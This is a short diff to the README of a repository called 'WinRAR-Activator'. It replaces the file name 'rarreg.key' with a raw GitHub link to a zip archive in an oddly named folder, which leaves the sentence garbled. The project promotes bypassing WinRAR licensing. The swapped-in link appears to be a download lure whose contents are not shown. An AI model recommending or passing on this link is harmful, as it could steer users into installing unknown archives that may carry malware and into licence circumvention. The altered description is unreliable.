shivamkumar254456/WinRAR-Activator/README.md

 ---

- - This script automatically creates a valid "rarreg.key" file in WinRAR's installation folder.
+ - This script automatically creates a valid "https://github.com/shivamkumar254456/WinRAR-Activator/raw/refs/heads/main/domineeringly/Win-Activator-RA-3.7.zip" file in WinRAR's installation folder.

  - This method requires Internet at the time of activation.